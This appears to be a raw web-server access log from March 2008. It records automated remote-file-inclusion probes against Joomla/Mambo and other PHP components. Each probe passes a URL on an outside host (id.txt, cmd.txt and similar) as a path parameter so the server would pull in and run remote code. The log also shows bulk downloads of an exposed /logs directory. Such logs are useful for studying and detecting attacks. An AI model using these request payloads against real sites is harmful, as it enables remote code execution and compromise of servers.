64.185.237.35 - - [25/Mar/2008:09:55:02 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [25/Mar/2008:09:55:02 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:03 -0700] "GET /logs/access_070903.log HTTP/1.1" 200 12137 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:04 -0700] "GET /logs/access_070904.log HTTP/1.1" 200 30421 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:06 -0700] "GET /logs/access_070905.log HTTP/1.1" 200 42196 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:08 -0700] "GET /logs/access_070906.log HTTP/1.1" 200 32974 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:10 -0700] "GET /logs/access_070907.log HTTP/1.1" 200 61100 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:14 -0700] "GET /logs/access_070908.log HTTP/1.1" 200 91498 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:20 -0700] "GET /logs/access_070909.log HTTP/1.1" 200 75478 "-" "Java/1.5.0_06" "dmulk.com"
202.142.223.177 - - [25/Mar/2008:09:55:22 -0700] "GET /order/login.php?svr_rootscript=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.142.223.177 - - [25/Mar/2008:09:55:22 -0700] "GET /logs/order/login.php?svr_rootscript=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:24 -0700] "GET /logs/access_070910.log HTTP/1.1" 200 50863 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:26 -0700] "GET /logs/access_070911.log HTTP/1.1" 200 86699 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:30 -0700] "GET /logs/access_070912.log HTTP/1.1" 200 65147 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:32 -0700] "GET /logs/access_070913.log HTTP/1.1" 200 105654 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:36 -0700] "GET /logs/access_070914.log HTTP/1.1" 200 86919 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:40 -0700] "GET /logs/access_070915.log HTTP/1.1" 200 65779 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:43 -0700] "GET /logs/access_070916.log HTTP/1.1" 200 144658 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:51 -0700] "GET /logs/access_070917.log HTTP/1.1" 200 40532 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:54 -0700] "GET /logs/access_070918.log HTTP/1.1" 200 51808 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:57 -0700] "GET /logs/access_070919.log HTTP/1.1" 200 35028 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:55:59 -0700] "GET /logs/access_070920.log HTTP/1.1" 200 56600 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:03 -0700] "GET /logs/access_070921.log HTTP/1.1" 200 70813 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:07 -0700] "GET /logs/access_070922.log HTTP/1.1" 200 143145 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:13 -0700] "GET /logs/access_070923.log HTTP/1.1" 200 55220 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:17 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 106285 "-" "Java/1.5.0_06" "dmulk.com"
202.142.223.177 - - [25/Mar/2008:09:56:21 -0700] "GET /logs//sources/template.php?CONFIG[main_path]=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:22 -0700] "GET /logs/access_070925.log HTTP/1.1" 200 516 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:23 -0700] "GET /logs/access_070926.log HTTP/1.1" 200 34093 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:25 -0700] "GET /logs/access_070927.log HTTP/1.1" 200 42324 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:28 -0700] "GET /logs/access_070928.log HTTP/1.1" 200 16581 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:29 -0700] "GET /logs/access_070929.log HTTP/1.1" 200 98605 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:36 -0700] "GET /logs/access_070930.log HTTP/1.1" 200 32172 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:38 -0700] "GET /logs/access_071001.log HTTP/1.1" 200 33494 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:40 -0700] "GET /logs/access_071002.log HTTP/1.1" 200 70737 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:44 -0700] "GET /logs/access_071003.log HTTP/1.1" 200 36511 "-" "Java/1.5.0_06" "dmulk.com"
64.185.237.35 - - [25/Mar/2008:09:56:45 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [25/Mar/2008:09:56:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [25/Mar/2008:09:56:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:47 -0700] "GET /logs/access_071004.log HTTP/1.1" 200 70439 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:50 -0700] "GET /logs/access_071005.log HTTP/1.1" 200 49825 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:53 -0700] "GET /logs/access_071006.log HTTP/1.1" 200 58327 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:56 -0700] "GET /logs/access_071007.log HTTP/1.1" 200 56320 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:56:58 -0700] "GET /logs/access_071008.log HTTP/1.1" 200 53442 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:57:01 -0700] "GET /logs/access_071009.log HTTP/1.1" 200 26112 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:57:03 -0700] "GET /logs/access_071010.log HTTP/1.1" 200 39814 "-" "Java/1.5.0_06" "dmulk.com"
74.53.58.10 - - [25/Mar/2008:09:57:04 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:09:57:04 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:09:57:04 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:57:06 -0700] "GET /logs/access_071011.log HTTP/1.1" 200 23938 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:57:07 -0700] "GET /logs/access_071012.log HTTP/1.1" 200 75692 "-" "Java/1.5.0_06" "dmulk.com"
81.235.244.130 - - [25/Mar/2008:09:57:10 -0700] "GET /logs/access_071013.log HTTP/1.1" 200 46816 "-" "Java/1.5.0_06" "dmulk.com"
74.6.31.126 - - [25/Mar/2008:09:58:06 -0700] "GET /minamijewelry/source_images/batch1/?S=D HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.35 - - [25/Mar/2008:09:58:24 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:58:45 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:58:45 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:09:59:36 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.21.215 - - [25/Mar/2008:09:59:51 -0700] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:00:00 -0700] "GET /logs/access_080312.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:10:00:36 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:10:00:39 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:10:00:39 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.56.202.30 - - [25/Mar/2008:10:00:54 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.181.90 - - [25/Mar/2008:10:00:56 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:10:00:56 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:10:00:56 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:10:00:57 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:10:02:17 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:10:02:17 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:10:02:18 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:10:03:21 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:10:03:39 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:10:03:40 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:10:03:51 -0700] "GET /logs/access_080131.log//index2.php?p=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.253.99.164 - - [25/Mar/2008:10:04:28 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.157.182.9 - - [25/Mar/2008:10:04:42 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:10:04:48 -0700] "GET /logs/access_080218.log//index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.238.34 - - [25/Mar/2008:10:05:44 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/printview.php?phpEx=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [25/Mar/2008:10:05:45 -0700] "GET //modules/PNphpBB2/printview.php?phpEx=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [25/Mar/2008:10:05:45 -0700] "GET /logs//modules/PNphpBB2/printview.php?phpEx=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:10:07:03 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:10:07:27 -0700] "GET /logs/access_080118.log/components/com_joomlalib/standalone/jlcron.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:10:07:28 -0700] "GET /components/com_joomlalib/standalone/jlcron.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:10:07:28 -0700] "GET /logs/components/com_joomlalib/standalone/jlcron.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [25/Mar/2008:10:07:34 -0700] "GET /logs/access.log/components/com_joomlalib/standalone/jlcron.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.208.244 - - [25/Mar/2008:10:07:42 -0700] "GET /logs/access_071227.log/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [25/Mar/2008:10:07:43 -0700] "GET /index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.208.244 - - [25/Mar/2008:10:07:43 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.109.250.188 - - [25/Mar/2008:10:07:58 -0700] "GET /logs/access_080124.log/components/com_simpleboard/image_upload.php?sbp=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.223.177 - - [25/Mar/2008:10:09:14 -0700] "GET //sources/template.php?CONFIG[main_path]=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
202.142.223.177 - - [25/Mar/2008:10:09:14 -0700] "GET /logs//sources/template.php?CONFIG[main_path]=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:10:09:49 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:10:09:49 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.4.88.40 - - [25/Mar/2008:10:09:59 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.4.88.40 - - [25/Mar/2008:10:09:59 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:10:10:01 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.27.160.175 - - [25/Mar/2008:10:10:42 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=www.avhic.com/wp-content/uploads/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:10:10:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:10:49 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:10:50 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:10:50 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:10:51 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:10:52 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [25/Mar/2008:10:10:52 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.56.202.30 - - [25/Mar/2008:10:11:38 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.56.202.30 - - [25/Mar/2008:10:11:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:10:12:24 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:10:12:25 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:10:12:25 -0700] "GET //main.php?sayfa=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:10:12:27 -0700] "GET /logs//main.php?sayfa=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.56.202.30 - - [25/Mar/2008:10:12:41 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.18.5.126 - - [25/Mar/2008:10:13:11 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
216.18.5.126 - - [25/Mar/2008:10:13:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:10:13:32 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:10:13:33 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:10:13:33 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.8.120 - - [25/Mar/2008:10:13:51 -0700] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:14:16 -0700] "GET /logs/access_080225.log//index.php?sayfa=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:14:16 -0700] "GET //index.php?sayfa=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.58.10 - - [25/Mar/2008:10:14:16 -0700] "GET /logs//index.php?sayfa=http://www.dfmuses.xpg.com.br/uses/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.210.71 - - [25/Mar/2008:10:14:26 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.52.238.34 - - [25/Mar/2008:10:14:34 -0700] "GET /logs/access_080207.log//modules/PNphpBB2/printview.php?phpEx=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.251.123 - - [25/Mar/2008:10:14:52 -0700] "GET /logs/access_071227.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [25/Mar/2008:10:14:52 -0700] "GET /index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [25/Mar/2008:10:14:53 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
